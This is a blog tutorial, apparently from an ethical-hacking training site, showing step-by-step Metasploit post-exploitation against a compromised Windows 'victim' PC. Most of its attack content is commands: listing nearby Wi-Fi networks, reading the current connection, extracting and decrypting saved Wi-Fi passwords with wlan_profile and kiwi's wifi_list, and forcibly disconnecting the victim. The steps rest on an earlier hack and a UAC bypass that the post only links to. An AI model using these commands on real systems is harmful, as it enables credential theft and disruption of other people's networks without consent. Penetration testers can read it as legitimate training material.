Wifi Post Exploitation on Remote PC

Hello readers! Today you will be learning about different ways to get basic service sets information of remote user’s Wi-Fi as well as current network connection information, and how to extract saved Wireless LAN profiles of remote pc after that you will be disconnecting target user’s Wi-Fi too.

First Hack the Victim PC Using Metasploit (tutorial how to hack remote pc) after that get admin access through Bypassuac (click here), once you have victim’s meterpreter session run given below post exploit  one-by-one. 

Get BSS information of a remote user’s Wi-Fi connection

This module gathers information about the wireless Basic Service Sets available to the victim machine.

e.g. this will give you SSID and other important  information regarding wireless connection.

msf > use post/windows/wlan/wlan_bss_list

msf post(wlan_bss_list) > set session 5

msf post(wlan_bss_list) > exploit

From given below image you can observe that here it has found “5 networks” such as Pen lab, Sinos , Ignite and etc along with there basic details. 

Get current Wi-Fi connection information of a remote user

This module gathers information about the current connection on each wireless lan interface on the target machine.

msf post(wlan_bss_list) > use post/windows/wlan/wlan_current_connection

msf post(wlan_current_connection) > set session 5

msf post(wlan_current_connection) > run

The given below image has disclose that  “pen Lab” is the current connection though which victim is connected more over it has shown some basic details such as : MAC address of router, Security status, Authentication type and etc.  

Get saved wireless LAN profile of a remote user

This module extracts saved Wireless LAN profiles. It will also try to decrypt the network key material. Behavior is slightly different between OS versions when it comes to WPA. In Windows Vista/7 we will get the passphrase. In Windows XP we will get the PBKDF2 derived key.

msf post> use post/windows/wlan/wlan_profile

msf post(wlan_profile) > set session 5

msf post(wlan_profile) > exploit

From given below image you can see it has extracted the profile of  wifi through which victim is connected moreover it has also decrypted the shared key (password). Hence you can confirm the password for “Pen Lab” is “[email protected]”.  


Disconnect a remote user’s Wi-Fi connection

This module disconnects the current wireless network connection on the specified interface.

msf > use post/windows/wlan/wlan_disconnect

msf post(wlan_disconnect) > set session 5

msf post(wlan_disconnect) > exploit

From given below image you can confirm that it is disconnecting the victim from current wireless network.

Other Way

I call it a post-exploitation toolkit because it has a lot of features, far beyond the ability to dump plain-text passwords.

meterpreter > load kiwi

meterpreter > help

This will give you entire wireless connection list with passwords as well.  VOILA! You got it right.

meterpreter > wifi_list

meterpreter > wifi_list_shared

Great!!  From given below image you can confirm that it has dump all shared keys (password)  and authentication of their respective SSID.

About Author

Nisha Yadav is trained in Certified Ethical hacking and Bug Bounty Hunter. She is currently working at Hiddenramp as a Security Analyst. Connect with her here

Related Posts Plugin for WordPress, Blogger...

Leave a Reply

Your email address will not be published. Required fields are marked *